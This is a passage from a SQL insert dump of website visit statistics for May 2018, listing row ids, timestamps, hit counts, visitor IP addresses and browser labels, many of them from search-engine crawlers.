5908,1,1,0,0,'178.154.171.88','other'),(246596,1526555946,1,1,0,0,'141.8.142.74','other'),(246597,1526556053,2,2,0,0,'91.196.178.162','chrome'),(246598,1526556118,1,0,1,0,'66.249.70.29',''),(246599,1526556126,1,1,0,0,'66.249.70.27','chrome'),(246600,1526556130,1,0,1,0,'66.249.64.30',''),(246601,1526556247,1,1,0,0,'54.36.148.198','other'),(246602,1526556334,1,1,0,0,'54.36.148.219','other'),(246603,1526556759,2,2,0,0,'91.196.178.66','chrome'),(246604,1526556869,1,1,0,0,'8.29.198.26','other'),(246605,1526557278,1,1,0,0,'54.36.148.62','other'),(246606,1526557467,1,1,0,0,'54.36.148.255','other'),(246607,1526557560,1,1,0,0,'91.196.178.94','chrome'),(246608,1526558038,1,1,0,0,'216.244.66.237','other'),(246609,1526558506,1,1,0,0,'54.36.148.154','other'),(246610,1526558515,1,1,0,0,'54.36.148.10','other'),(246611,1526558623,1,1,0,0,'54.36.148.75','other'),(246612,1526558762,2,2,0,0,'91.196.178.94','chrome'),(246613,1526558840,1,1,0,0,'54.36.148.208','other'),(246614,1526559112,3,3,0,0,'91.196.178.161','chrome'),(246615,1526559132,1,1,0,0,'54.36.148.207','other'),(246616,1526559458,1,1,0,0,'46.118.234.216','chrome'),(246617,1526559470,1,1,0,0,'54.36.148.157','other'),(246618,1526559579,1,1,0,0,'185.76.69.18','chrome'),(246619,1526559618,1,1,0,0,'54.36.148.186','other'),(246620,1526559652,1,1,0,0,'54.36.149.54','other'),(246621,1526559693,1,0,1,0,'66.249.64.28',''),(246622,1526559788,1,1,0,0,'54.36.148.113','other'),(246623,1526560267,1,0,1,0,'66.249.64.30',''),(246624,1526560326,1,1,0,0,'54.36.148.155','other'),(246625,1526560379,1,1,0,0,'54.36.148.213','other'),(246626,1526560602,1,0,1,0,'66.249.64.29',''),(246627,1526560671,1,1,0,0,'40.77.167.174','other'),(246628,1526561409,1,1,0,0,'141.8.132.19','other'),(246629,1526561556,1,1,0,0,'54.36.148.103','other'),(246630,1526561567,1,1,0,0,'54.36.148.153','other'),(246631,1526561714,2,2,0,0,'91.196.178.94','chrome'),(246632,1526562008,1,1,0,0,'91.196.178.161','chrome'),(246633,1526562094,3,0,3,0,'66.249.64.28',''),(246634,1526562111,1,1,0,0,'54.36.149.65','other'),(246635,1526562118,1,1,0,0,'54.36.149.79','other'),(246636,1526562196,1,0,1,0,'66.249.64.30',''),(246637,1526562446,1,1,0,0,'54.36.148.242','other'),(246638,1526562524,1,1,0,0,'80.252.154.233','chrome'),(246639,1526562593,1,1,0,0,'54.36.149.28','other'),(246640,1526562704,1,1,0,0,'8.29.198.27','other'),(246641,1526562890,1,1,0,0,'176.32.4.208','chrome'),(246642,1526563241,2,2,0,0,'141.8.142.74','other'),(246643,1526563313,1,1,0,0,'91.196.178.94','chrome'),(246644,1526563406,1,0,1,0,'66.249.64.30',''),(246645,1526563730,1,1,0,0,'91.196.178.134','firefox'),(246646,1526563764,1,1,0,0,'162.210.196.100','other'),(246647,1526563936,1,1,0,0,'54.36.148.184','other'),(246648,1526564194,1,1,0,0,'54.36.148.127','other'),(246649,1526564354,1,1,0,0,'91.196.178.66','firefox'),(246650,1526564501,1,1,0,0,'54.36.149.98','other'),(246651,1526564538,4,4,0,0,'141.8.142.74','other'),(246652,1526564708,1,1,0,0,'54.36.148.19','other'),(246653,1526564738,1,1,0,0,'54.36.149.1','other'),(246654,1526564766,2,2,0,0,'91.196.178.169','chrome'),(246655,1526564848,1,1,0,0,'54.36.148.235','other'),(246656,1526565089,1,0,1,0,'66.249.64.28',''),(246657,1526565173,1,1,0,0,'95.163.107.70','firefox'),(246658,1526565177,1,1,0,0,'46.133.124.165','chrome'),(246659,1526565698,2,2,0,0,'91.196.178.66','chrome'),(246660,1526565773,1,1,0,0,'141.8.142.74','other'),(246661,1526565959,1,1,0,0,'91.196.178.135','chrome'),(246662,1526566232,1,1,0,0,'216.244.66.237','other'),(246663,1526566237,1,1,0,0,'54.36.148.124','other'),(246664,1526566428,1,1,0,0,'91.196.177.46','chrome'),(246665,1526566877,1,0,1,0,'66.249.64.30',''),(246666,1526566897,1,1,0,0,'54.36.148.253','other'),(246667,1526567035,2,2,0,0,'178.154.171.88','other'),(246668,1526567293,1,1,0,0,'54.36.148.209','other'),(246669,1526567518,1,1,0,0,'54.36.148.132','other'),(246670,1526567611,1,1,0,0,'54.36.148.84','other'),(246671,1526567620,1,1,0,0,'54.36.148.150','other'),(246672,1526567621,1,1,0,0,'141.8.142.74','other'),(246673,1526567663,1,1,0,0,'217.69.133.3','other'),(246674,1526567711,1,1,0,0,'8.29.198.27','other'),(246675,1526567731,1,1,0,0,'91.196.178.16','chrome'),(246676,1526568310,1,1,0,0,'54.36.148.51','other'),(246677,1526568639,1,0,1,0,'66.249.64.30',''),(246678,1526568770,1,1,0,0,'188.230.43.254','other'),(246679,1526569042,2,2,0,0,'178.154.171.88','other'),(246680,1526569418,1,1,0,0,'54.36.149.95','other'),(246681,1526569758,1,1,0,0,'217.69.133.4','other'),(246682,1526569835,1,0,1,0,'66.249.64.30',''),(246683,1526570489,1,1,0,0,'54.36.148.250','other'),(246684,1526570534,1,1,0,0,'54.36.148.195','other'),(246685,1526570732,1,1,0,0,'54.36.149.13','other'),(246686,1526571143,1,0,1,0,'66.249.64.29',''),(246687,1526571163,1,1,0,0,'188.230.43.254','other'),(246688,1526571322,3,3,0,0,'178.154.171.88','other'),(246689,1526571326,1,1,0,0,'54.36.149.16','other'),(246690,1526571345,1,1,0,0,'54.36.148.63','other'),(246691,1526571623,1,1,0,0,'54.36.148.175','other'),(246692,1526571952,1,1,0,0,'54.36.149.1','other'),(246693,1526571980,1,1,0,0,'54.36.148.224','other'),(246694,1526572048,1,1,0,0,'54.36.149.71','other'),(246695,1526572220,1,1,0,0,'54.36.149.65','other'),(246696,1526572773,2,2,0,0,'141.8.142.74','other'),(246697,1526572887,1,1,0,0,'54.36.148.107','other'),(246698,1526573147,2,2,0,0,'193.19.152.14','chrome'),(246699,1526573536,1,1,0,0,'8.29.198.25','other'),(246700,1526573570,1,1,0,0,'188.230.43.254','other'),(246701,1526573595,1,1,0,0,'54.36.148.148','other'),(246702,1526573640,1,1,0,0,'54.36.149.4','other'),(246703,1526573687,1,1,0,0,'178.154.171.88','other'),(246704,1526573785,1,1,0,0,'54.36.149.87','other'),(246705,1526574207,2,2,0,0,'141.8.142.74','other'),(246706,1526574368,1,0,1,0,'66.249.64.28',''),(246707,1526574586,1,1,0,0,'54.36.148.21','other'),(246708,1526574602,1,1,0,0,'54.36.148.250','other'),(246709,1526574797,1,1,0,0,'54.36.149.78','other'),(246710,1526574847,1,1,0,0,'54.36.148.119','other'),(246711,1526574864,1,1,0,0,'54.36.148.33','other'),(246712,1526575022,4,4,0,0,'62.210.101.101','other'),(246713,1526575159,1,1,0,0,'54.36.148.193','other'),(246714,1526575208,1,1,0,0,'54.36.149.28','other'),(246715,1526575461,22,22,0,0,'144.217.15.198','other'),(246716,1526575491,1,1,0,0,'95.216.11.58','other'),(246717,1526575563,1,1,0,0,'54.36.148.152','other'),(246718,1526575727,1,1,0,0,'54.36.148.91','other'),(246719,1526575799,1,1,0,0,'54.36.149.14','other'),(246720,1526575893,1,1,0,0,'40.77.167.62','other'),(246721,1526575970,1,1,0,0,'188.230.43.254','other'),(246722,1526576010,1,1,0,0,'54.36.148.173','other'),(246723,1526576102,1,1,0,0,'54.36.148.234','other'),(246724,1526576251,1,1,0,0,'37.73.83.79','chrome'),(246725,1526576325,1,1,0,0,'54.36.148.172','other'),(246726,1526576586,2,2,0,0,'141.8.142.74','other'),(246727,1526576608,1,1,0,0,'54.36.148.235','other'),(246728,1526576701,1,1,0,0,'54.36.148.105','other'),(246729,1526576729,1,1,0,0,'91.196.178.65','firefox'),(246730,1526576945,1,1,0,0,'54.36.149.27','other'),(246731,1526577016,1,1,0,0,'54.36.148.122','other'),(246732,1526577114,1,1,0,0,'54.36.149.107','other'),(246733,1526577252,1,1,0,0,'54.36.149.8','other'),(246734,1526577492,1,1,0,0,'54.36.148.96','other'),(246735,1526578016,1,1,0,0,'54.36.149.92','other'),(246736,1526578038,1,1,0,0,'178.154.171.88','other'),(246737,1526578156,1,1,0,0,'54.36.148.115','other'),(246738,1526578293,1,1,0,0,'95.158.42.155','chrome'),(246739,1526578435,1,1,0,0,'188.230.43.254','other'),(246740,1526578531,1,1,0,0,'54.36.148.230','other'),(246741,1526578555,1,1,0,0,'8.29.198.26','other'),(246742,1526578556,1,1,0,0,'54.36.148.207','other'),(246743,1526578591,1,1,0,0,'54.36.148.69','other'),(246744,1526578798,2,2,0,0,'216.244.66.237','other'),(246745,1526578833,1,1,0,0,'54.36.148.50','other'),(246746,1526579398,2,2,0,0,'91.196.178.8','chrome'),(246747,1526579526,1,1,0,0,'217.69.133.203','other'),(246748,1526579550,1,1,0,0,'178.154.171.88','other'),(246749,1526579921,1,1,0,0,'54.36.149.73','other'),(246750,1526580018,1,1,0,0,'141.8.142.74','other'),(246751,1526580019,1,1,0,0,'54.36.148.164','other'),(246752,1526580034,1,1,0,0,'54.36.148.189','other'),(246753,1526580135,1,1,0,0,'54.36.148.243','other'),(246754,1526580228,1,1,0,0,'54.36.148.194','other'),(246755,1526580644,1,1,0,0,'54.36.148.202','other'),(246756,1526580678,1,1,0,0,'54.36.148.193','other'),(246757,1526580799,1,1,0,0,'54.36.149.101','other'),(246758,1526580853,1,1,0,0,'54.36.148.120','other'),(246759,1526580922,1,1,0,0,'54.36.148.158','other'),(246760,1526581030,1,1,0,0,'54.36.148.164','other'),(246761,1526581281,1,1,0,0,'54.36.148.96','other'),(246762,1526581529,1,1,0,0,'141.8.142.74','other'),(246763,1526581732,3,3,0,0,'178.154.171.88','other'),(246764,1526581766,1,1,0,0,'54.36.148.216','other'),(246765,1526582136,1,1,0,0,'87.250.224.46','other'),(246766,1526582400,2,0,2,0,'66.249.64.28',''),(246767,1526582518,1,1,0,0,'47.106.146.167','other'),(246768,1526583033,1,1,0,0,'54.36.148.32','other'),(246769,1526583080,1,1,0,0,'54.36.148.70','other'),(246770,1526583440,1,1,0,0,'54.36.149.69','other'),(246771,1526583502,1,1,0,0,'85.114.211.252','opera'),(246772,1526583961,2,2,0,0,'141.8.142.74','other'),(246773,1526584105,2,2,0,0,'178.154.171.88','other'),(246774,1526584363,1,1,0,0,'8.29.198.26','other'),(246775,1526584571,1,1,0,0,'54.36.148.54','other'),(246776,1526584623,2,2,0,0,'91.196.177.24','chrome'),(246777,1526584716,1,1,0,0,'54.36.149.52','other'),(246778,1526584925,1,0,1,0,'66.249.64.29',''),(246779,1526585006,1,1,0,0,'54.36.149.1','other'),(246780,1526585513,1,1,0,0,'178.154.171.88','other'),(246781,1526585592,1,1,0,0,'54.36.148.51','other'),(246782,1526585693,2,2,0,0,'157.55.39.190','other'),(246783,1526585892,4,0,4,0,'66.249.64.30',''),(246784,1526585944,1,0,1,0,'66.249.70.29',''),(246785,1526585956,1,1,0,0,'178.154.171.4','other'),(246786,1526586087,1,1,0,0,'54.36.149.39','other'),(246787,1526586489,1,0,1,0,'66.249.64.29',''),(246788,1526586505,1,1,0,0,'54.36.148.100','other'),(246789,1526586544,1,1,0,0,'54.36.148.86','other'),(246790,1526586623,1,1,0,0,'54.36.149.64','other'),(246791,1526586628,2,1,1,0,'66.249.70.25',''),(246792,1526586673,2,2,0,0,'178.154.171.88','other'),(246793,1526586724,1,1,0,0,'54.36.149.101','other'),(246794,1526587726,2,2,0,0,'141.8.142.74','other'),(246795,1526588256,1,1,0,0,'54.36.149.101','other'),(246796,1526588507,1,1,0,0,'54.36.148.197','other'),(246797,1526588677,1,1,0,0,'54.36.148.174','other'),(246798,1526589406,1,1,0,0,'8.29.198.26','other'),(246799,1526589528,1,1,0,0,'54.36.148.130','other'),(246800,1526589560,1,1,0,0,'35.226.23.240','other'),(246801,1526590117,1,1,0,0,'54.36.149.10','other'),(246802,1526590119,1,1,0,0,'54.36.149.87','other'),(246803,1526590295,1,1,0,0,'54.36.148.194','other'),(246804,1526590523,1,1,0,0,'54.36.148.92','other'),(246805,1526590559,1,1,0,0,'54.36.148.22','other'),(246806,1526590587,1,1,0,0,'54.36.149.85','other'),(246807,1526590625,1,1,0,0,'54.36.148.190','other'),(246808,1526591349,1,1,0,0,'217.69.133.4','other'),(246809,1526591383,1,1,0,0,'54.36.149.64','other'),(246810,1526591448,1,0,1,0,'66.249.64.29',''),(246811,1526591537,2,0,2,0,'66.249.64.28',''),(246812,1526591659,1,1,0,0,'54.36.149.105','other'),(246813,1526591807,1,1,0,0,'95.27.169.111','msie'),(246814,1526591818,1,1,0,0,'54.36.149.0','other'),(246815,1526591848,1,1,0,0,'54.36.148.50','other'),(246816,1526592000,1,1,0,0,'54.36.148.155','other'),(246817,1526592206,1,1,0,0,'54.36.149.92','other'),(246818,1526592506,1,1,0,0,'54.36.148.161','other'),(246819,1526592559,1,1,0,0,'54.36.148.153','other'),(246820,1526592755,1,1,0,0,'87.250.224.46','other'),(246821,1526592805,1,1,0,0,'54.36.148.62','other'),(246822,1526592962,1,1,0,0,'141.8.142.74','other'),(246823,1526593092,1,1,0,0,'54.36.149.75','other'),(246824,1526593151,1,1,0,0,'54.36.148.216','other'),(246825,1526593158,1,1,0,0,'157.55.39.190','other'),(246826,1526593174,1,1,0,0,'54.36.149.45','other'),(246827,1526593201,1,1,0,0,'54.36.148.180','other'),(246828,1526593374,1,1,0,0,'54.36.149.94','other'),(246829,1526593597,1,1,0,0,'54.36.148.156','other'),(246830,1526593680,1,0,1,0,'66.249.64.30',''),(246831,1526593761,1,0,1,0,'66.249.64.29',''),(246832,1526594082,1,1,0,0,'54.36.148.213','other'),(246833,1526594541,1,1,0,0,'54.36.148.75','other'),(246834,1526594632,1,1,0,0,'54.36.148.157','other'),(246835,1526594828,1,1,0,0,'54.36.148.184','other'),(246836,1526595195,1,1,0,0,'8.29.198.26','other'),(246837,1526595316,1,1,0,0,'141.8.142.74','other'),(246838,1526595617,1,1,0,0,'46.118.234.216','chrome'),(246839,1526596113,1,1,0,0,'54.36.148.26','other'),(246840,1526596471,1,1,0,0,'54.36.148.195','other'),(246841,1526596520,1,1,0,0,'54.36.149.93','other'),(246842,1526596776,1,1,0,0,'216.244.66.237','other'),(246843,1526596936,1,1,0,0,'178.154.171.88','other'),(246844,1526597204,1,1,0,0,'88.135.218.172','firefox'),(246845,1526597229,1,1,0,0,'54.36.149.45','other'),(246846,1526597458,1,1,0,0,'54.36.148.144','other'),(246847,1526597948,1,1,0,0,'216.244.66.237','other'),(246848,1526598271,1,1,0,0,'54.36.149.87','other'),(246849,1526598964,1,1,0,0,'54.36.148.91','other'),(246850,1526598968,1,1,0,0,'141.8.142.74','other'),(246851,1526598982,1,1,0,0,'216.244.66.237','other'),(246852,1526599199,1,1,0,0,'54.36.148.233','other'),(246853,1526599289,1,0,1,0,'66.249.64.30',''),(246854,1526599375,1,1,0,0,'46.133.183.196','chrome'),(246855,1526600246,1,1,0,0,'8.29.198.27','other'),(246856,1526600491,3,1,2,0,'66.249.64.30',''),(246857,1526600716,1,1,0,0,'158.69.252.176','other'),(246858,1526600726,4,0,4,0,'66.249.64.28',''),(246859,1526600768,1,0,1,0,'66.249.70.27',''),(246860,1526600834,1,0,1,0,'66.249.64.29',''),(246861,1526600850,1,1,0,0,'54.36.148.216','other'),(246862,1526601371,1,0,1,0,'66.249.70.25',''),(246863,1526601374,1,1,0,0,'66.249.70.25','chrome'),(246864,1526601480,1,1,0,0,'54.36.149.60','other'),(246865,1526601718,1,1,0,0,'54.36.148.192','other'),(246866,1526601968,1,1,0,0,'54.36.148.147','other'),(246867,1526602346,1,1,0,0,'54.36.149.37','other'),(246868,1526602488,1,1,0,0,'54.36.149.102','other'),(246869,1526602726,1,1,0,0,'54.36.149.36','other'),(246870,1526603184,1,1,0,0,'54.36.148.111','other'),(246871,1526603346,1,1,0,0,'216.244.66.237','other'),(246872,1526604076,1,1,0,0,'54.36.148.120','other'),(246873,1526604373,1,1,0,0,'141.8.142.74','other'),(246874,1526604473,1,1,0,0,'178.154.171.88','other'),(246875,1526604605,1,1,0,0,'54.36.148.141','other'),(246876,1526604723,1,1,0,0,'54.36.148.112','other'),(246877,1526604769,1,1,0,0,'54.36.148.166','other'),(246878,1526605071,1,1,0,0,'54.36.148.110','other'),(246879,1526605578,1,1,0,0,'54.36.148.187','other'),(246880,1526605649,1,1,0,0,'54.36.148.70','other'),(246881,1526606031,1,1,0,0,'8.29.198.25','other'),(246882,1526606138,1,1,0,0,'54.36.148.94','other'),(246883,1526606318,1,1,0,0,'54.36.149.69','other'),(246884,1526606351,1,1,0,0,'54.36.148.45','other'),(246885,1526606739,1,1,0,0,'141.8.142.74','other'),(246886,1526606917,1,1,0,0,'54.36.148.158','other'),(246887,1526607642,1,1,0,0,'54.36.148.160','other'),(246888,1526607840,1,1,0,0,'54.36.148.122','other'),(246889,1526607857,2,2,0,0,'178.154.171.88','other'),(246890,1526608234,1,1,0,0,'54.36.148.127','other'),(246891,1526608657,1,1,0,0,'54.36.149.88','other'),(246892,1526608659,1,1,0,0,'54.36.149.35','other'),(246893,1526609073,2,2,0,0,'216.244.66.237','other'),(246894,1526609134,1,1,0,0,'54.36.148.140','other'),(246895,1526609228,1,1,0,0,'54.36.149.84','other'),(246896,1526609358,1,1,0,0,'54.36.148.220','other'),(246897,1526609387,1,1,0,0,'54.36.148.229','other'),(246898,1526609662,1,1,0,0,'54.36.149.27','other'),(246899,1526609701,1,1,0,0,'54.36.148.249','other'),(246900,1526610823,1,1,0,0,'54.36.148.218','other'),(246901,1526611080,1,1,0,0,'8.29.198.27','other'),(246902,1526611267,1,1,0,0,'54.36.148.226','other'),(246903,1526611498,1,1,0,0,'54.36.149.49','other'),(246904,1526611584,1,1,0,0,'54.36.148.29','other'),(246905,1526612092,1,1,0,0,'87.250.224.46','other'),(246906,1526612175,1,1,0,0,'54.36.148.27','other'),(246907,1526612241,1,1,0,0,'54.36.148.184','other'),(246908,1526612689,1,1,0,0,'54.36.148.221','other'),(246909,1526612747,1,1,0,0,'54.36.149.101','other'),(246910,1526612923,1,1,0,0,'66.249.64.28','chrome'),(246911,1526612964,1,1,0,0,'66.249.70.25','chrome'),(246912,1526613167,1,1,0,0,'216.244.66.237','other'),(246913,1526613298,1,1,0,0,'141.8.142.74','other'),(246914,1526613456,1,1,0,0,'54.36.149.12','other'),(246915,1526613516,106,106,0,0,'94.23.200.86','other'),(246916,1526613572,2,2,0,0,'40.77.167.41','other'),(246917,1526613689,1,1,0,0,'54.36.148.212','other'),(246918,1526613808,1,1,0,0,'54.36.149.21','other'),(246919,1526614083,1,1,0,0,'54.36.148.132','other'),(246920,1526614294,2,2,0,0,'141.8.142.74','other'),(246921,1526614531,1,1,0,0,'54.36.149.78','other'),(246922,1526614881,1,1,0,0,'54.36.148.140','other'),(246923,1526615224,1,1,0,0,'204.79.180.2','msie'),(246924,1526615621,3,3,0,0,'141.8.142.74','other'),(246925,1526615747,2,2,0,0,'178.154.171.88','other'),(246926,1526615925,1,1,0,0,'54.36.148.92','other'),(246927,1526616240,1,1,0,0,'54.36.148.247','other'),(246928,1526616462,1,1,0,0,'54.36.148.97','other'),(246929,1526616749,1,1,0,0,'217.69.133.203','other'),(246930,1526616863,1,1,0,0,'8.29.198.25','other'),(246931,1526617354,1,1,0,0,'178.154.171.88','other'),(246932,1526617519,1,1,0,0,'54.36.148.33','other'),(246933,1526617568,1,0,1,0,'66.249.64.28',''),(246934,1526617613,1,1,0,0,'54.36.148.30','other'),(246935,1526617863,1,1,0,0,'37.9.113.82','other'),(246936,1526617973,1,1,0,0,'54.36.149.71','other'),(246937,1526618018,1,1,0,0,'54.36.148.132','other'),(246938,1526618237,1,1,0,0,'54.36.148.24','other'),(246939,1526618643,1,1,0,0,'54.36.148.238','other'),(246940,1526618672,1,1,0,0,'54.36.148.87','other'),(246942,1526618724,1,1,0,0,'54.36.149.25','other'),(246943,1526619512,1,1,0,0,'54.36.149.82','other'),(246944,1526619560,1,1,0,0,'54.36.148.146','other'),(246945,1526619628,1,1,0,0,'54.36.148.182','other'),(246946,1526619907,1,1,0,0,'54.36.149.18','other'),(246947,1526620102,1,0,1,0,'66.249.64.29',''),(246948,1526620322,1,1,0,0,'178.154.171.88','other'),(246949,1526620534,1,1,0,0,'54.36.149.58','other'),(246950,1526620670,1,1,0,0,'54.36.149.101','other'),(246951,1526620981,1,1,0,0,'54.36.148.43','other'),(246952,1526621310,1,1,0,0,'54.36.149.5','other'),(246953,1526621355,1,1,0,0,'54.36.148.152','other'),(246954,1526621911,1,1,0,0,'8.29.198.25','other'),(246955,1526622008,1,1,0,0,'54.36.148.179','other'),(246956,1526622109,1,1,0,0,'54.36.149.72','other'),(246957,1526622356,1,1,0,0,'54.36.148.81','other'),(246958,1526622749,1,1,0,0,'54.36.148.91','other'),(246959,1526622868,1,1,0,0,'54.36.148.43','other'),(246960,1526622936,1,1,0,0,'216.244.66.237','other'),(246961,1526622947,1,1,0,0,'217.69.133.194','other'),(246962,1526623058,1,1,0,0,'217.69.133.4','other'),(246963,1526623158,1,1,0,0,'54.36.149.66','other'),(246964,1526623234,1,1,0,0,'54.36.148.125','other'),(246965,1526623308,1,1,0,0,'178.154.171.88','other'),(246966,1526623412,1,1,0,0,'54.36.149.82','other'),(246967,1526623502,1,1,0,0,'54.36.148.83','other'),(246968,1526623771,1,1,0,0,'188.230.43.254','other'),(246969,1526623957,1,1,0,0,'54.36.148.172','other'),(246970,1526624075,2,2,0,0,'91.196.178.90','chrome'),(246971,1526624116,1,1,0,0,'54.36.148.203','other'),(246972,1526624145,1,0,1,0,'66.249.70.29',''),(246973,1526624224,1,1,0,0,'95.132.16.188','firefox'),(246974,1526624278,2,2,0,0,'91.196.178.169','chrome'),(246975,1526624296,1,1,0,0,'54.36.148.105','other'),(246976,1526624334,1,1,0,0,'35.226.23.240','other'),(246977,1526624343,1,1,0,0,'66.249.64.29','chrome'),(246978,1526624348,1,1,0,0,'66.249.70.25','chrome'),(246979,1526624386,1,1,0,0,'54.36.149.34','other'),(246980,1526624521,1,1,0,0,'141.8.142.74','other'),(246981,1526624550,1,1,0,0,'54.36.149.66','other'),(246982,1526624662,1,1,0,0,'87.250.224.46','other'),(246983,1526624707,1,1,0,0,'54.36.148.91','other'),(246984,1526625035,1,1,0,0,'216.244.66.237','other'),(246985,1526625141,1,1,0,0,'54.36.148.186','other'),(246986,1526625304,1,1,0,0,'54.36.149.88','other'),(246987,1526625344,1,1,0,0,'54.36.149.59','other'),(246988,1526625411,2,2,0,0,'91.196.178.94','chrome'),(246989,1526625721,1,1,0,0,'54.36.149.39','other'),(246990,1526625769,1,0,1,0,'66.249.64.28',''),(246991,1526625900,1,1,0,0,'54.36.148.118','other'),(246992,1526625966,2,2,0,0,'91.196.178.16','chrome'),(246993,1526625996,1,1,0,0,'178.154.200.41','other'),(246994,1526626226,1,1,0,0,'54.36.149.13','other'),(246995,1526626405,1,1,0,0,'54.36.149.66','other'),(246996,1526626612,1,1,0,0,'80.252.155.198','chrome'),(246997,1526626963,1,1,0,0,'146.185.158.24','chrome'),(246998,1526627199,1,1,0,0,'54.36.148.193','other'),(246999,1526627433,1,1,0,0,'54.36.148.140','other'),(247000,1526627532,1,1,0,0,'54.36.148.107','other'),(247001,1526627683,1,1,0,0,'8.29.198.26','other'),(247002,1526627738,1,1,0,0,'46.200.159.108','chrome'),(247003,1526627832,1,1,0,0,'54.36.148.203','other'),(247004,1526627933,1,1,0,0,'54.36.148.122','other'),(247005,1526627950,1,1,0,0,'54.36.149.39','other'),(247006,1526627957,1,1,0,0,'37.52.7.251','chrome'),(247007,1526627966,1,1,0,0,'217.69.133.2','other'),(247008,1526628039,1,1,0,0,'54.36.148.98','other'),(247009,1526628431,1,0,1,0,'66.249.64.29',''),(247010,1526628579,1,1,0,0,'95.108.213.24','other'),(247011,1526628655,1,1,0,0,'54.36.148.230','other'),(247012,1526628689,1,1,0,0,'54.36.148.228','other'),(247013,1526628700,1,1,0,0,'54.36.148.134','other'),(247014,1526628965,1,0,1,0,'66.249.64.30',''),(247015,1526629479,1,1,0,0,'54.36.148.84','other'),(247016,1526629771,1,1,0,0,'66.249.64.28','chrome'),(247017,1526629805,1,1,0,0,'66.249.70.29','chrome'),(247018,1526629817,1,1,0,0,'141.8.142.134','other'),(247019,1526629892,1,1,0,0,'54.36.148.118','other'),(247020,1526630075,1,1,0,0,'193.106.30.99','firefox'),(247021,1526630099,2,2,0,0,'162.210.196.98','other'),(247022,1526630154,1,1,0,0,'157.55.39.77','other'),(247023,1526630249,1,1,0,0,'54.36.148.166','other'),(247024,1526630466,1,1,0,0,'54.36.149.79','other'),(247025,1526630552,1,1,0,0,'178.154.200.73','other'),(247026,1526630555,1,1,0,0,'54.36.149.66','other'),(247027,1526630701,2,2,0,0,'54.165.59.7','other'),(247028,1526630839,1,1,0,0,'54.36.148.248','other'),(247029,1526631237,1,1,0,0,'54.36.149.2','other'),(247030,1526631310,1,1,0,0,'54.36.149.39','other'),(247031,1526631742,1,1,0,0,'54.36.149.11','other'),(247032,1526632196,1,1,0,0,'54.36.148.122','other'),(247033,1526632399,1,0,1,0,'66.249.70.25',''),(247034,1526632663,1,1,0,0,'54.36.148.197','other'),(247035,1526632689,1,1,0,0,'54.36.148.128','other'),(247036,1526632756,1,1,0,0,'8.29.198.26','other'),(247037,1526632757,1,1,0,0,'216.244.66.237','other'),(247038,1526632767,1,1,0,0,'54.36.148.213','other'),(247039,1526632853,1,1,0,0,'178.154.171.88','other'),(247040,1526633392,1,1,0,0,'54.36.149.100','other'),(247041,1526633407,1,1,0,0,'54.36.148.122','other'),(247042,1526633523,1,1,0,0,'54.36.149.90','other'),(247043,1526633593,1,1,0,0,'54.36.149.18','other'),(247044,1526633775,1,1,0,0,'54.36.148.23','other'),(247045,1526633889,1,1,0,0,'54.36.148.10','other'),(247046,1526634269,1,0,1,0,'66.249.64.29',''),(247047,1526634286,1,1,0,0,'54.36.149.7','other'),(247048,1526634478,1,1,0,0,'217.69.133.4','other'),(247049,1526634575,1,1,0,0,'47.106.149.44','other'),(247050,1526634647,1,1,0,0,'217.69.133.9','other'),(247051,1526634842,1,1,0,0,'66.249.70.27','chrome'),(247052,1526635495,1,1,0,0,'54.36.149.7','other'),(247053,1526635530,1,1,0,0,'54.36.148.13','other'),(247054,1526635598,1,1,0,0,'54.36.148.145','other'),(247055,1526635699,1,1,0,0,'31.43.233.247','firefox'),(247056,1526635920,1,1,0,0,'54.36.148.133','other'),(247057,1526635942,1,1,0,0,'54.36.149.42','other'),(247058,1526635971,1,1,0,0,'54.36.149.96','other'),(247059,1526635973,1,1,0,0,'54.36.148.87','other'),(247060,1526636051,1,1,0,0,'54.36.149.60','other'),(247061,1526636085,1,1,0,0,'91.124.182.170','firefox'),(247062,1526636110,1,1,0,0,'54.36.148.227','other'),(247063,1526636240,1,1,0,0,'54.36.148.169','other'),(247064,1526636608,1,1,0,0,'54.36.149.36','other'),(247065,1526636649,1,1,0,0,'54.36.148.245','other'),(247066,1526636786,1,1,0,0,'31.43.233.247','firefox'),(247067,1526636793,1,1,0,0,'54.36.148.113','other'),(247068,1526637144,1,1,0,0,'54.36.148.189','other'),(247069,1526637332,1,1,0,0,'54.36.148.56','other'),(247070,1526637486,1,1,0,0,'54.36.148.223','other'),(247071,1526637572,1,1,0,0,'54.36.148.84','other'),(247072,1526637602,1,1,0,0,'54.36.149.27','other'),(247073,1526637756,1,1,0,0,'54.36.148.18','other'),(247074,1526637924,2,2,0,0,'92.112.125.243','chrome'),(247075,1526638102,1,1,0,0,'54.36.149.25','other'),(247076,1526638127,1,1,0,0,'54.36.148.87','other'),(247077,1526638161,1,1,0,0,'23.20.7.34','other'),(247078,1526638330,1,1,0,0,'92.112.227.105','firefox'),(247079,1526638408,1,1,0,0,'216.244.66.237','other'),(247080,1526638485,1,1,0,0,'54.36.148.211','other'),(247081,1526638515,1,1,0,0,'8.29.198.26','other'),(247082,1526638673,1,1,0,0,'54.36.149.48','other'),(247083,1526638683,1,1,0,0,'54.36.148.237','other'),(247084,1526638705,1,1,0,0,'157.55.39.77','other'),(247085,1526638747,1,1,0,0,'54.36.148.67','other'),(247086,1526639088,2,2,0,0,'217.69.133.194','other'),(247087,1526639403,1,1,0,0,'54.36.148.69','other'),(247088,1526639481,1,1,0,0,'54.36.148.53','other'),(247089,1526639497,1,1,0,0,'54.36.149.97','other'),(247090,1526639574,2,0,2,0,'66.249.64.29',''),(247091,1526639726,1,1,0,0,'54.36.148.33','other'),(247092,1526639793,1,0,1,0,'66.249.64.30',''),(247093,1526639814,1,1,0,0,'217.69.133.6','other'),(247094,1526639863,1,1,0,0,'54.36.148.160','other'),(247095,1526639870,1,1,0,0,'54.36.148.119','other'),(247096,1526640192,1,1,0,0,'66.249.70.27','chrome'),(247097,1526640249,1,1,0,0,'54.36.148.17','other'),(247098,1526640375,1,1,0,0,'54.36.148.75','other'),(247099,1526640708,1,0,1,0,'66.249.64.28',''),(247100,1526640992,1,1,0,0,'37.52.1.212','chrome'),(247101,1526641004,1,1,0,0,'91.196.178.53','chrome'),(247102,1526641265,1,1,0,0,'54.36.148.226','other'),(247103,1526641303,1,1,0,0,'54.36.148.116','other'),(247104,1526641313,1,1,0,0,'66.249.64.28','chrome'),(247105,1526641824,1,1,0,0,'54.36.149.40','other'),(247106,1526641873,1,1,0,0,'54.36.149.68','other'),(247107,1526641894,2,2,0,0,'91.196.177.46','chrome'),(247108,1526642022,1,1,0,0,'54.36.149.100','other'),(247109,1526642218,1,1,0,0,'54.36.148.246','other'),(247110,1526642435,1,1,0,0,'35.